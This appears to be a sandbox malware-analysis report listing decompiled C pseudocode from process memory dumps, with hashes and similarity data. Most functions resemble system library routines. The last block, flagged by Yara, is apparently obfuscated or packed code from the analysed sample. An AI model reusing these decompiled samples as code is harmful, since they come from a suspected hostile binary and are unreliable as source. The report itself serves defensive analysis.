                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 636c5b3cdbe3bf0bd01692a8a6859876b0f871e1725eda9b07efa7b47f4081d6
                                                                                                                                    • Instruction ID: 9d4a82df9441d3a5b5247b1347d03caf8482461271b9425ba3e9f0871af5f0ce
                                                                                                                                    • Opcode Fuzzy Hash: 636c5b3cdbe3bf0bd01692a8a6859876b0f871e1725eda9b07efa7b47f4081d6
                                                                                                                                    • Instruction Fuzzy Hash: 07110476A102808BC3129B39DC81ED3FBB8EF42314F00069EE5595B0C3E7756525C391
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                    			E04B39240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                    				intOrPtr _t33;
                                                                                                                                    				intOrPtr _t37;
                                                                                                                                    				intOrPtr _t41;
                                                                                                                                    				intOrPtr* _t46;
                                                                                                                                    				void* _t48;
                                                                                                                                    				intOrPtr _t50;
                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                    				void* _t61;
                                                                                                                                    				intOrPtr _t62;
                                                                                                                                    				intOrPtr _t65;
                                                                                                                                    				void* _t66;
                                                                                                                                    				void* _t68;
                                                                                                                                    
                                                                                                                                    				_push(0xc);
                                                                                                                                    				_push(0x4c0f708);
                                                                                                                                    				E04B8D08C(__ebx, __edi, __esi);
                                                                                                                                    				_t65 = __ecx;
                                                                                                                                    				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                                                                                                    				if( *(__ecx + 0x24) != 0) {
                                                                                                                                    					_push( *(__ecx + 0x24));
                                                                                                                                    					E04B795D0();
                                                                                                                                    					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                                                                                                    				}
                                                                                                                                    				L6();
                                                                                                                                    				L6();
                                                                                                                                    				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                                                                                                    				E04B795D0();
                                                                                                                                    				_t33 =  *0x4c284c4; // 0x0
                                                                                                                                    				L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                                                                                                    				_t37 =  *0x4c284c4; // 0x0
                                                                                                                                    				L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                                                                                                    				_t41 =  *0x4c284c4; // 0x0
                                                                                                                                    				E04B52280(L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4c286b4);
                                                                                                                                    				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                                                                                                    				_t46 = _t65 + 0xe8;
                                                                                                                                    				_t62 =  *_t46;
                                                                                                                                    				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                                                                                                    				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                                                                                                    					_t61 = 3;
                                                                                                                                    					asm("int 0x29");
                                                                                                                                    					_push(_t65);
                                                                                                                                    					_t66 = _t61;
                                                                                                                                    					_t23 = _t66 + 0x14; // 0x8df8084c
                                                                                                                                    					_push( *_t23);
                                                                                                                                    					E04B795D0();
                                                                                                                                    					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                                                                                                    					_push( *_t24);
                                                                                                                                    					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                                                                                                    					_t48 = E04B795D0();
                                                                                                                                    					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                                                                                                    					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                                                                                                    					return _t48;
                                                                                                                                    				} else {
                                                                                                                                    					 *_t60 = _t62;
                                                                                                                                    					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                                                                                                    					 *(_t68 - 4) = 0xfffffffe;
                                                                                                                                    					E04B39325();
                                                                                                                                    					_t50 =  *0x4c284c4; // 0x0
                                                                                                                                    					return E04B8D0D1(L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                                                                                                    				}
                                                                                                                                    			}
















                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 2cb3a4a1341292e041356fb35420071ebff156843fee130f999901c7359bf51f
                                                                                                                                    • Instruction ID: 313dc4b665c9f1b586648dc77ec85e42a16f34d5edf6bff7fbb9373e477f161d
                                                                                                                                    • Opcode Fuzzy Hash: 2cb3a4a1341292e041356fb35420071ebff156843fee130f999901c7359bf51f
                                                                                                                                    • Instruction Fuzzy Hash: 332148B2151A40DFD722EF28CA50F59BBB9FF08708F0446A8A049876B1CB75F941CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E04BB46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                                                                                                                    				signed short* _v8;
                                                                                                                                    				unsigned int _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				signed int _t22;
                                                                                                                                    				signed char _t23;
                                                                                                                                    				short _t32;
                                                                                                                                    				void* _t38;
                                                                                                                                    				char* _t40;
                                                                                                                                    
                                                                                                                                    				_v12 = __edx;
                                                                                                                                    				_t29 = 0;
                                                                                                                                    				_v8 = __ecx;
                                                                                                                                    				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                                                                                                                    				_t38 = L04B54620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                    					_t40 = _a4;
                                                                                                                                    					 *_t40 = 1;
                                                                                                                                    					E04B7F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                                                                                                                    					_t22 = _v12 >> 1;
                                                                                                                                    					_t32 = 0x2e;
                                                                                                                                    					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                                                                                                                    					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                                                                                                                    					_t23 = E04B6D268(_t38, 1);
                                                                                                                                    					asm("sbb al, al");
                                                                                                                                    					 *_t40 =  ~_t23 + 1;
                                                                                                                                    					L04B577F0(_v16, 0, _t38);
                                                                                                                                    				} else {
                                                                                                                                    					 *_a4 = 0;
                                                                                                                                    					_t29 = 0xc0000017;
                                                                                                                                    				}
                                                                                                                                    				return _t29;
                                                                                                                                    			}












                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                                    • Instruction ID: 5fb4c55e373d0fcacd557d3f67cb373c4952df3dd02f8e45805b5d1b9b40bb68
                                                                                                                                    • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                                    • Instruction Fuzzy Hash: 28110272604208BBDB019F5CD8809BEBBB9EF85304F1080AAF9848B351DA319D51D7A4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                    			E04B39080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                                                                                    				intOrPtr* _t51;
                                                                                                                                    				intOrPtr _t59;
                                                                                                                                    				signed int _t64;
                                                                                                                                    				signed int _t67;
                                                                                                                                    				signed int* _t71;
                                                                                                                                    				signed int _t74;
                                                                                                                                    				signed int _t77;
                                                                                                                                    				signed int _t82;
                                                                                                                                    				intOrPtr* _t84;
                                                                                                                                    				void* _t85;
                                                                                                                                    				intOrPtr* _t87;
                                                                                                                                    				void* _t94;
                                                                                                                                    				signed int _t95;
                                                                                                                                    				intOrPtr* _t97;
                                                                                                                                    				signed int _t99;
                                                                                                                                    				signed int _t102;
                                                                                                                                    				void* _t104;
                                                                                                                                    
                                                                                                                                    				_push(__ebx);
                                                                                                                                    				_push(__esi);
                                                                                                                                    				_push(__edi);
                                                                                                                                    				_t97 = __ecx;
                                                                                                                                    				_t102 =  *(__ecx + 0x14);
                                                                                                                                    				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                                                                                                    					_t102 = _t102 | 0x000007d0;
                                                                                                                                    				}
                                                                                                                                    				_t48 =  *[fs:0x30];
                                                                                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                                                                                    					_t102 = _t102 & 0xff000000;
                                                                                                                                    				}
                                                                                                                                    				_t80 = 0x4c285ec;
                                                                                                                                    				E04B52280(_t48, 0x4c285ec);
                                                                                                                                    				_t51 =  *_t97 + 8;
                                                                                                                                    				if( *_t51 != 0) {
                                                                                                                                    					L6:
                                                                                                                                    					return E04B4FFB0(_t80, _t97, _t80);
                                                                                                                                    				} else {
                                                                                                                                    					 *(_t97 + 0x14) = _t102;
                                                                                                                                    					_t84 =  *0x4c2538c; // 0x771c6888
                                                                                                                                    					if( *_t84 != 0x4c25388) {
                                                                                                                                    						_t85 = 3;
                                                                                                                                    						asm("int 0x29");
                                                                                                                                    						asm("int3");
                                                                                                                                    						asm("int3");
                                                                                                                                    						asm("int3");
                                                                                                                                    						asm("int3");
                                                                                                                                    						asm("int3");
                                                                                                                                    						asm("int3");
                                                                                                                                    						asm("int3");
                                                                                                                                    						asm("int3");
                                                                                                                                    						asm("int3");
                                                                                                                                    						asm("int3");
                                                                                                                                    						asm("int3");
                                                                                                                                    						asm("int3");
                                                                                                                                    						_push(0x2c);
                                                                                                                                    						_push(0x4c0f6e8);
                                                                                                                                    						E04B8D0E8(0x4c285ec, _t97, _t102);
                                                                                                                                    						 *((char*)(_t104 - 0x1d)) = 0;
                                                                                                                                    						_t99 =  *(_t104 + 8);
                                                                                                                                    						__eflags = _t99;
                                                                                                                                    						if(_t99 == 0) {
                                                                                                                                    							L13:
                                                                                                                                    							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                    								E04C088F5(_t80, _t85, 0x4c25388, _t99, _t102, __eflags);
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							__eflags = _t99 -  *0x4c286c0; // 0x9307b0
                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                    								goto L13;
                                                                                                                                    							} else {
                                                                                                                                    								__eflags = _t99 -  *0x4c286b8; // 0x0
                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                    									goto L13;
                                                                                                                                    								} else {
                                                                                                                                    									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                                                                                                    									__eflags =  *((char*)(_t59 + 0x28));
                                                                                                                                    									if( *((char*)(_t59 + 0x28)) == 0) {
                                                                                                                                    										E04B52280(_t99 + 0xe0, _t99 + 0xe0);
                                                                                                                                    										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                                                                                                    										__eflags =  *((char*)(_t99 + 0xe5));
                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                    											E04C088F5(0x4c285ec, _t85, 0x4c25388, _t99, _t102, __eflags);
                                                                                                                                    										} else {
                                                                                                                                    											__eflags =  *((char*)(_t99 + 0xe4));
                                                                                                                                    											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                                                                                                    												 *((char*)(_t99 + 0xe4)) = 1;
                                                                                                                                    												_push(_t99);
                                                                                                                                    												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                                                                                                    												E04B7AFD0();
                                                                                                                                    											}
                                                                                                                                    											while(1) {
                                                                                                                                    												_t71 = _t99 + 8;
                                                                                                                                    												 *(_t104 - 0x2c) = _t71;
                                                                                                                                    												_t80 =  *_t71;
                                                                                                                                    												_t95 = _t71[1];
                                                                                                                                    												 *(_t104 - 0x28) = _t80;
                                                                                                                                    												 *(_t104 - 0x24) = _t95;
                                                                                                                                    												while(1) {
                                                                                                                                    													L19:
                                                                                                                                    													__eflags = _t95;
                                                                                                                                    													if(_t95 == 0) {
                                                                                                                                    														break;
                                                                                                                                    													}
                                                                                                                                    													_t102 = _t80;
                                                                                                                                    													 *(_t104 - 0x30) = _t95;
                                                                                                                                    													 *(_t104 - 0x24) = _t95 - 1;
                                                                                                                                    													asm("lock cmpxchg8b [edi]");
                                                                                                                                    													_t80 = _t102;
                                                                                                                                    													 *(_t104 - 0x28) = _t80;
                                                                                                                                    													 *(_t104 - 0x24) = _t95;
                                                                                                                                    													__eflags = _t80 - _t102;
                                                                                                                                    													_t99 =  *(_t104 + 8);
                                                                                                                                    													if(_t80 != _t102) {
                                                                                                                                    														continue;
                                                                                                                                    													} else {
                                                                                                                                    														__eflags = _t95 -  *(_t104 - 0x30);
                                                                                                                                    														if(_t95 !=  *(_t104 - 0x30)) {
                                                                                                                                    															continue;
                                                                                                                                    														} else {
                                                                                                                                    															__eflags = _t95;
                                                                                                                                    															if(_t95 != 0) {
                                                                                                                                    																_t74 = 0;
                                                                                                                                    																 *(_t104 - 0x34) = 0;
                                                                                                                                    																_t102 = 0;
                                                                                                                                    																__eflags = 0;
                                                                                                                                    																while(1) {
                                                                                                                                    																	 *(_t104 - 0x3c) = _t102;
                                                                                                                                    																	__eflags = _t102 - 3;
                                                                                                                                    																	if(_t102 >= 3) {
                                                                                                                                    																		break;
                                                                                                                                    																	}
                                                                                                                                    																	__eflags = _t74;
                                                                                                                                    																	if(_t74 != 0) {
                                                                                                                                    																		L49:
                                                                                                                                    																		_t102 =  *_t74;
                                                                                                                                    																		__eflags = _t102;
                                                                                                                                    																		if(_t102 != 0) {
                                                                                                                                    																			_t102 =  *(_t102 + 4);
                                                                                                                                    																			__eflags = _t102;
                                                                                                                                    																			if(_t102 != 0) {
                                                                                                                                    																				 *0x4c2b1e0(_t74, _t99);
                                                                                                                                    																				 *_t102();
                                                                                                                                    																			}
                                                                                                                                    																		}
                                                                                                                                    																		do {
                                                                                                                                    																			_t71 = _t99 + 8;
                                                                                                                                    																			 *(_t104 - 0x2c) = _t71;
                                                                                                                                    																			_t80 =  *_t71;
                                                                                                                                    																			_t95 = _t71[1];
                                                                                                                                    																			 *(_t104 - 0x28) = _t80;
                                                                                                                                    																			 *(_t104 - 0x24) = _t95;
                                                                                                                                    																			goto L19;
                                                                                                                                    																		} while (_t74 == 0);
                                                                                                                                    																		goto L49;
                                                                                                                                    																	} else {
                                                                                                                                    																		_t82 = 0;
                                                                                                                                    																		__eflags = 0;
                                                                                                                                    																		while(1) {
                                                                                                                                    																			 *(_t104 - 0x38) = _t82;
                                                                                                                                    																			__eflags = _t82 -  *0x4c284c0;
                                                                                                                                    																			if(_t82 >=  *0x4c284c0) {
                                                                                                                                    																				break;
                                                                                                                                    																			}
                                                                                                                                    																			__eflags = _t74;
                                                                                                                                    																			if(_t74 == 0) {
                                                                                                                                    																				_t77 = E04C09063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                                                                                                    																				__eflags = _t77;
                                                                                                                                    																				if(_t77 == 0) {
                                                                                                                                    																					_t74 = 0;
                                                                                                                                    																					__eflags = 0;
                                                                                                                                    																				} else {
                                                                                                                                    																					_t74 = _t77 + 0xfffffff4;
                                                                                                                                    																				}
                                                                                                                                    																				 *(_t104 - 0x34) = _t74;
                                                                                                                                    																				_t82 = _t82 + 1;
                                                                                                                                    																				continue;
                                                                                                                                    																			}
                                                                                                                                    																			break;
                                                                                                                                    																		}
                                                                                                                                    																		_t102 = _t102 + 1;
                                                                                                                                    																		continue;
                                                                                                                                    																	}
                                                                                                                                    																	goto L20;
                                                                                                                                    																}
                                                                                                                                    																__eflags = _t74;
                                                                                                                                    															}
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    													break;
                                                                                                                                    												}
                                                                                                                                    												L20:
                                                                                                                                    												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                                                                                                    												 *((char*)(_t99 + 0xe5)) = 1;
                                                                                                                                    												 *((char*)(_t104 - 0x1d)) = 1;
                                                                                                                                    												goto L21;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    										L21:
                                                                                                                                    										 *(_t104 - 4) = 0xfffffffe;
                                                                                                                                    										E04B3922A(_t99);
                                                                                                                                    										_t64 = E04B57D50();
                                                                                                                                    										__eflags = _t64;
                                                                                                                                    										if(_t64 != 0) {
                                                                                                                                    											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                    										} else {
                                                                                                                                    											_t67 = 0x7ffe0386;
                                                                                                                                    										}
                                                                                                                                    										__eflags =  *_t67;
                                                                                                                                    										if( *_t67 != 0) {
                                                                                                                                    											_t67 = E04C08B58(_t99);
                                                                                                                                    										}
                                                                                                                                    										__eflags =  *((char*)(_t104 - 0x1d));
                                                                                                                                    										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                                                                                                    											__eflags = _t99 -  *0x4c286c0; // 0x9307b0
                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                    												__eflags = _t99 -  *0x4c286b8; // 0x0
                                                                                                                                    												if(__eflags == 0) {
                                                                                                                                    													_t94 = 0x4c286bc;
                                                                                                                                    													_t87 = 0x4c286b8;
                                                                                                                                    													goto L27;
                                                                                                                                    												} else {
                                                                                                                                    													__eflags = _t67 | 0xffffffff;
                                                                                                                                    													asm("lock xadd [edi], eax");
                                                                                                                                    													if(__eflags == 0) {
                                                                                                                                    														E04B39240(_t80, _t99, _t99, _t102, __eflags);
                                                                                                                                    													}
                                                                                                                                    												}
                                                                                                                                    											} else {
                                                                                                                                    												_t94 = 0x4c286c4;
                                                                                                                                    												_t87 = 0x4c286c0;
                                                                                                                                    												L27:
                                                                                                                                    												E04B69B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									} else {
                                                                                                                                    										goto L13;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						return E04B8D130(_t80, _t99, _t102);
                                                                                                                                    					} else {
                                                                                                                                    						 *_t51 = 0x4c25388;
                                                                                                                                    						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                                                                                                    						 *_t84 = _t51;
                                                                                                                                    						 *0x4c2538c = _t51;
                                                                                                                                    						goto L6;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}




















                                                                                                                                    0x04b391a9
                                                                                                                                    0x04b391b0
                                                                                                                                    0x00000000
                                                                                                                                    0x04b391b0
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b391b4
                                                                                                                                    0x04b391b4
                                                                                                                                    0x04b391bb
                                                                                                                                    0x04b391c0
                                                                                                                                    0x04b391c5
                                                                                                                                    0x04b391c7
                                                                                                                                    0x04b937da
                                                                                                                                    0x04b391cd
                                                                                                                                    0x04b391cd
                                                                                                                                    0x04b391cd
                                                                                                                                    0x04b391d2
                                                                                                                                    0x04b391d5
                                                                                                                                    0x04b39239
                                                                                                                                    0x04b39239
                                                                                                                                    0x04b391d7
                                                                                                                                    0x04b391db
                                                                                                                                    0x04b391e1
                                                                                                                                    0x04b391e7
                                                                                                                                    0x04b391fd
                                                                                                                                    0x04b39203
                                                                                                                                    0x04b3921e
                                                                                                                                    0x04b39223
                                                                                                                                    0x00000000
                                                                                                                                    0x04b39205
                                                                                                                                    0x04b39205
                                                                                                                                    0x04b39208
                                                                                                                                    0x04b3920c
                                                                                                                                    0x04b39214
                                                                                                                                    0x04b39214
                                                                                                                                    0x04b3920c
                                                                                                                                    0x04b391e9
                                                                                                                                    0x04b391e9
                                                                                                                                    0x04b391ee
                                                                                                                                    0x04b391f3
                                                                                                                                    0x04b391f3
                                                                                                                                    0x04b391f3
                                                                                                                                    0x04b391e7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b39134
                                                                                                                                    0x04b39125
                                                                                                                                    0x04b3911d
                                                                                                                                    0x04b3914e
                                                                                                                                    0x04b390d1
                                                                                                                                    0x04b390d1
                                                                                                                                    0x04b390d3
                                                                                                                                    0x04b390d6
                                                                                                                                    0x04b390d8
                                                                                                                                    0x00000000
                                                                                                                                    0x04b390d8
                                                                                                                                    0x04b390cf

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1ffc1026fb36535c0e1988d298124eff10f9aa48a658cde2191f5c5bc23fd39e
                                                                                                                                    • Instruction ID: 7bc57e4b964bd67c28a9449699f2cd9b84d655e47a6dc325dc475a14cccd3528
                                                                                                                                    • Opcode Fuzzy Hash: 1ffc1026fb36535c0e1988d298124eff10f9aa48a658cde2191f5c5bc23fd39e
                                                                                                                                    • Instruction Fuzzy Hash: E101F4B2A026009FE3299F29D940B12B7A9EB81325F2140A6E5019B691C3F5FC41CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 18%
                                                                                                                                    			E00416227(signed int __eax, signed char __ebx, void* __ecx, signed int __edi, void* __esi) {
                                                                                                                                    				signed char _t31;
                                                                                                                                    				signed int _t32;
                                                                                                                                    				signed int _t36;
                                                                                                                                    				signed char _t44;
                                                                                                                                    				void* _t45;
                                                                                                                                    				void* _t49;
                                                                                                                                    				signed int _t55;
                                                                                                                                    				signed int _t56;
                                                                                                                                    				void* _t63;
                                                                                                                                    				signed int _t69;
                                                                                                                                    				void* _t72;
                                                                                                                                    				void* _t77;
                                                                                                                                    
                                                                                                                                    				L0:
                                                                                                                                    				while(1) {
                                                                                                                                    					L0:
                                                                                                                                    					_t55 = __edi;
                                                                                                                                    					_t49 = __ecx;
                                                                                                                                    					_t44 = __ebx;
                                                                                                                                    					_t31 = __eax & 0x000000bd;
                                                                                                                                    					L2:
                                                                                                                                    					while(_t72 <= 0) {
                                                                                                                                    						 *(_t55 - 0x15) =  ~( *(_t55 - 0x15));
                                                                                                                                    						_t72 = _t31 - 0x7e5ef602;
                                                                                                                                    					}
                                                                                                                                    					_t32 = _t31 | 0x000000d0;
                                                                                                                                    					_push(_t44);
                                                                                                                                    					 *0x45 =  *0x45 - _t32;
                                                                                                                                    					if( *0x45 >= 0) {
                                                                                                                                    						asm("int1");
                                                                                                                                    						asm("lds edx, [edi-0x4d]");
                                                                                                                                    						_pop(_t55);
                                                                                                                                    						asm("aaa");
                                                                                                                                    					}
                                                                                                                                    					asm("arpl [edx], dx");
                                                                                                                                    					 *0x45 =  *0x45 | _t32;
                                                                                                                                    					asm("wait");
                                                                                                                                    					asm("pushfd");
                                                                                                                                    					asm("das");
                                                                                                                                    					asm("fsubr st0, st1");
                                                                                                                                    					asm("invalid");
                                                                                                                                    					asm("das");
                                                                                                                                    					asm("in eax, 0x86");
                                                                                                                                    					_t36 =  *(( *0xd6106c7a | _t44) + 0x2eeef7b) |  *_t55;
                                                                                                                                    					asm("stosb");
                                                                                                                                    					_t56 = _t55 |  *(_t49 - 0x7a);
                                                                                                                                    					asm("invalid");
                                                                                                                                    					asm("cld");
                                                                                                                                    					do {
                                                                                                                                    						L6:
                                                                                                                                    						asm("sbb esp, esp");
                                                                                                                                    						asm("cmpsb");
                                                                                                                                    						 *0xceeefd2b = _t36;
                                                                                                                                    						asm("out 0x48, al");
                                                                                                                                    						_t36 = _t36 &  *0x2956A75B;
                                                                                                                                    						L7:
                                                                                                                                    						_t63 = 0x2956a7a3;
                                                                                                                                    						asm("clc");
                                                                                                                                    						goto 0xe29;
                                                                                                                                    						asm("repne mov [bp+0x1b], fs");
                                                                                                                                    						asm("out dx, al");
                                                                                                                                    						asm("sbb edi, 0xea762863");
                                                                                                                                    					} while (0x8795d7d3 >> 0x8795d7d3 > 0);
                                                                                                                                    					_t45 = _t44 + 1;
                                                                                                                                    					asm("movsd");
                                                                                                                                    					asm("adc eax, 0xa9bd2400");
                                                                                                                                    				}
                                                                                                                                    				_t77 = _t63 - 1;
                                                                                                                                    				if(_t77 != 0) {
                                                                                                                                    					L12:
                                                                                                                                    					asm("adc al, 0xed");
                                                                                                                                    					asm("lodsb");
                                                                                                                                    					asm("adc [esi+ebp*4+0x65], dh");
                                                                                                                                    					_push(0x24);
                                                                                                                                    					 *0x000001B7 =  *((intOrPtr*)(0x1b7)) + _t45 + _t69;
                                                                                                                                    					asm("cdq");
                                                                                                                                    					_t36 = 0xffffffffdb4c4daf;
                                                                                                                                    				} else {
                                                                                                                                    					if(_t77 >= 0) {
                                                                                                                                    						 *(_t45 + 0x7e + _t36 * 2) =  *(_t45 + 0x7e + _t36 * 2) >> 0x8795d7d3 >> 0x8795d7d3;
                                                                                                                                    						asm("lahf");
                                                                                                                                    						asm("sbb eax, 0xb37fb519");
                                                                                                                                    						 *(_t69 + _t56 * 8 - 0x67f7563f) = _t56;
                                                                                                                                    						asm("std");
                                                                                                                                    						asm("fmulp st6, st0");
                                                                                                                                    						_t18 = (_t36 ^ 0x0000002a | _t56) + 0xae07ad42;
                                                                                                                                    						_t36 = _t69;
                                                                                                                                    						_t69 = _t18;
                                                                                                                                    						asm("out dx, eax");
                                                                                                                                    						_t45 = _t45 + 1 - 1;
                                                                                                                                    						_t56 = _t56 |  *(_t45 - 0x2b1edf88);
                                                                                                                                    						asm("movsd");
                                                                                                                                    						asm("movsd");
                                                                                                                                    						 *_t36 =  *_t36 + 0x14;
                                                                                                                                    						asm("aaa");
                                                                                                                                    						asm("sbb esp, [edi]");
                                                                                                                                    						 *(_t56 + 0x61) =  *(_t56 + 0x61) << 0xbadbac;
                                                                                                                                    						asm("sbb eax, 0x9238f338");
                                                                                                                                    						 *0x97dc031d = _t36;
                                                                                                                                    						goto L12;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				asm("sbb ebx, [ecx+0x1c93159d]");
                                                                                                                                    				return _t36 ^ 0xdb4c4d8a;
                                                                                                                                    			}















                                                                                                                                    0x004161ec
                                                                                                                                    0x004161ef
                                                                                                                                    0x004161f1
                                                                                                                                    0x004161f2
                                                                                                                                    0x004161f2
                                                                                                                                    0x004161f2
                                                                                                                                    0x004161f4
                                                                                                                                    0x004161fb
                                                                                                                                    0x00416200
                                                                                                                                    0x00416202
                                                                                                                                    0x00416203
                                                                                                                                    0x00416203
                                                                                                                                    0x0041620b
                                                                                                                                    0x0041620e
                                                                                                                                    0x00416215
                                                                                                                                    0x0041621a
                                                                                                                                    0x0041621b
                                                                                                                                    0x0041621b
                                                                                                                                    0x00416223
                                                                                                                                    0x00416224
                                                                                                                                    0x00416225
                                                                                                                                    0x00416225
                                                                                                                                    0x0041622e
                                                                                                                                    0x0041622f
                                                                                                                                    0x0041626f
                                                                                                                                    0x00416272
                                                                                                                                    0x00416276
                                                                                                                                    0x00416278
                                                                                                                                    0x0041627c
                                                                                                                                    0x0041627e
                                                                                                                                    0x00416282
                                                                                                                                    0x00416283
                                                                                                                                    0x00416231
                                                                                                                                    0x00416231
                                                                                                                                    0x00416233
                                                                                                                                    0x00416239
                                                                                                                                    0x0041623a
                                                                                                                                    0x0041623f
                                                                                                                                    0x00416249
                                                                                                                                    0x0041624a
                                                                                                                                    0x00416251
                                                                                                                                    0x00416251
                                                                                                                                    0x00416251
                                                                                                                                    0x00416253
                                                                                                                                    0x00416254
                                                                                                                                    0x00416255
                                                                                                                                    0x0041625b
                                                                                                                                    0x0041625c
                                                                                                                                    0x0041625d
                                                                                                                                    0x00416260
                                                                                                                                    0x00416263
                                                                                                                                    0x00416265
                                                                                                                                    0x00416268
                                                                                                                                    0x0041626d
                                                                                                                                    0x00000000
                                                                                                                                    0x0041626d
                                                                                                                                    0x00416231
                                                                                                                                    0x00416289
                                                                                                                                    0x00416299

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b663c1996ee065c985d21b508a21b5076a93f4d9708f9a4a4d15cc1e81dd48fe
                                                                                                                                    • Instruction ID: 1d5e59fa00cd10b49099bfd80265090411c8b9fb6e9db818f0b9653b45bb975c
